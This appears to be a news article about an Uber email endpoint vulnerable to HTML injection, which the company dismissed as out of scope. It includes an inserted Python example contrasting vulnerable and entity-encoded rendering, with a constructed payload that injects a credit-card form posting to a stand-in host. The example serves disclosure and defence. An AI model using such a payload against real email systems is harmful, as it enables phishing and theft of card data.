Uber dismisses vulnerability that lets anyone send email as Uber


A vulnerability in Uber’s email system allows anyone to send email on behalf of Uber.

The researcher who discovered the flaw warns that this vulnerability can be exploited by malicious actors to send email to 57 million Uber users and drivers whose information was leaked during the 2016 data breach.

Uber appears to be aware of the flaw but has not fixed it yet.

“Your Uber is coming now”

Security researcher and bug hunter Seif Elsallamy discovered a loophole in Uber’s systems that allows anyone to send emails on behalf of Uber.

These emails, sent from Uber’s own servers, would appear legitimate to an email provider (because technically they are) and stand a good chance of passing spam filters.

Imagine receiving a message from Uber saying, “Your Uber is coming now” or “Your Thursday morning trip with Uber”, when you have never taken those trips.

During a demo, Elsallamy sent me the following email, which without a doubt appeared to be from Uber and landed straight in my inbox, not in spam:

PoC email sent to BleepingComputer from Uber’s servers

The form embedded in the PoC email urges the Uber customer to provide their credit card information.

Note, however, that the message had a clear disclaimer at the bottom stating “this is a proof of concept security vulnerability” and was sent to BleepingComputer with pre-authorization.

PoC disclaimer in the email sent to BleepingComputer via Uber’s servers

On New Year’s Eve 2021, the researcher responsibly reported the vulnerability to Uber through its HackerOne bug bounty program.

However, his report was dismissed as “out of scope” on the mistaken assumption that exploiting the technical flaw itself required some form of social engineering:

Uber dismisses the researcher’s report, concluding it requires social engineering (Twitter)

57 million Uber customers and drivers at risk

Contrary to what one might think, this is not a simple case of email spoofing used by threat actors to create phishing emails.

Indeed, the email sent by the researcher “from Uber” to BleepingComputer passed both DKIM and DMARC checks, according to the email headers we’ve seen. That is expected: the message is generated and delivered by Uber’s own mail infrastructure, and SPF, DKIM and DMARC authenticate the sending domain, not the content of the message, so they offer no protection against a body that is injected at the source.

Email sent “from Uber” passes DKIM and DMARC security checks (BleepingComputer)

The researcher’s email was sent via SendGrid, an email marketing and customer communication platform used by many large companies.

However, Elsallamy tells BleepingComputer that the flaw lies in an endpoint exposed on Uber’s servers, which lets anyone craft the contents of an email sent on Uber’s behalf.

The vulnerability is “an HTML injection into one of Uber’s email endpoints,” Elsallamy explains, comparing it to a similar flaw discovered in 2019 on Meta (Facebook) servers by pen-tester Youssef Sammouda.

In Meta’s case, the endpoint looked like this:

https://legal.tapprd.thefacebook.com/tapprd/Portal/ShowWorkFlow/AnonymousEmbed/XXXXXXXXXXXXX

Naturally, for security reasons, the researcher did not disclose the vulnerable Uber endpoint.

He asks Uber: “Bring your [calculator] and tell me what would be the result if this vulnerability had been used with the 57 million emails [addresses that leaked] of the last data breach?”

“If you know the outcome, tell your employees on the Bug Bounty Triage Team.”

Elsallamy refers to the Uber data breach in 2016 that exposed the personal information of 57 million Uber customers and drivers.

For that incident, the UK Information Commissioner’s Office (ICO) fined Uber £385,000, and the Dutch Data Protection Authority (Autoriteit Persoonsgegevens) fined the company €600,000.

By exploiting this unpatched vulnerability, adversaries can potentially send targeted phishing scams to millions of Uber users previously affected by the breach.

When asked what Uber could do to correct the flaw, the researcher replied:

“They should clean up user input in a vulnerable, undisclosed form. Since the HTML code is rendered, they can use a security encoding library to perform HTML entity encoding so that any HTML code appears as text,” Elsallamy told BleepingComputer.
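To make the fix concrete, the following is an added example and not Uber’s code or anything the researcher published: the vulnerable endpoint, the template, the field name, the addresses and the attacker payload are all constructed. It shows the bug class described above (user-controlled text interpolated straight into an HTML email body) next to the hardened form that HTML-entity-encodes the input, using Python’s standard-library `html.escape` as the “security encoding library”. It also wraps both bodies in the same MIME envelope to make the point that the sending domain, and therefore SPF/DKIM/DMARC, is identical in the two cases.

```python
import html
from email.message import EmailMessage

# Constructed HTML template standing in for the undisclosed Uber email form.
# {name} is the spot where user-controlled input lands in the rendered body.
TEMPLATE = """<html><body>
<p>Hi {name},</p>
<p>Thanks for riding with us. Your receipt is attached.</p>
</body></html>"""

# Constructed attacker input: closes the greeting paragraph and injects a
# credit-card form posting to a hypothetical attacker-controlled host.
PAYLOAD = (
    'Rider</p>'
    '<form action="https://payments.example.net/update" method="post">'
    '<p>Your payment method failed. Re-enter your card to keep riding:</p>'
    '<input name="card_number"><button>Update card</button>'
    '</form><p>'
)


def render_vulnerable(name: str) -> str:
    """Interpolates raw input into the HTML body: the HTML-injection bug class."""
    return TEMPLATE.format(name=name)


def render_hardened(name: str) -> str:
    """HTML-entity-encodes the input first, so any markup is shown as text.

    html.escape(quote=True) rewrites < > & " and ' into entities, which is the
    encoding the researcher recommends; the template itself stays trusted.
    """
    return TEMPLATE.format(name=html.escape(name, quote=True))


def contains_injected_form(body: str) -> bool:
    """Detection helper: does a live <form> tag survive in the rendered body?"""
    return "<form" in body.lower()


def build_message(name: str, renderer) -> EmailMessage:
    """Wraps the rendered body in a MIME message as a transactional sender would.

    The envelope and headers are identical whichever renderer is used, which is
    why domain authentication (SPF/DKIM/DMARC) cannot tell the two apart.
    Addresses are constructed for the example.
    """
    msg = EmailMessage()
    msg["From"] = "Receipts <noreply@uber.example>"  # constructed address
    msg["To"] = "rider@example.com"                   # constructed address
    msg["Subject"] = "Your Thursday morning trip with Uber"
    msg.set_content("Your receipt is attached.")
    msg.add_alternative(renderer(name), subtype="html")
    return msg


def html_body(msg: EmailMessage) -> str:
    """Returns the decoded text/html part of a message built by build_message."""
    return msg.get_body(("html",)).get_content()


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(html_body(build_message(PAYLOAD, render_vulnerable)))
    print("--- hardened rendering ---")
    print(html_body(build_message(PAYLOAD, render_hardened)))
```

Running the script prints the two bodies: in the first, the injected form is live HTML the mail client will render; in the second, the same payload appears as literal `&lt;form ...&gt;` text inside the greeting. The lesson for triage is that this is fixed at the rendering layer of the endpoint, not at the mail provider, since the provider correctly signs whatever Uber’s application hands it.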

BleepingComputer contacted Uber well in advance of publication but has not yet received a response.

Uber users, staff, drivers and associates should beware of phishing emails that appear to come from Uber and pass authentication checks, as exploitation of this flaw by malicious actors remains a possibility.
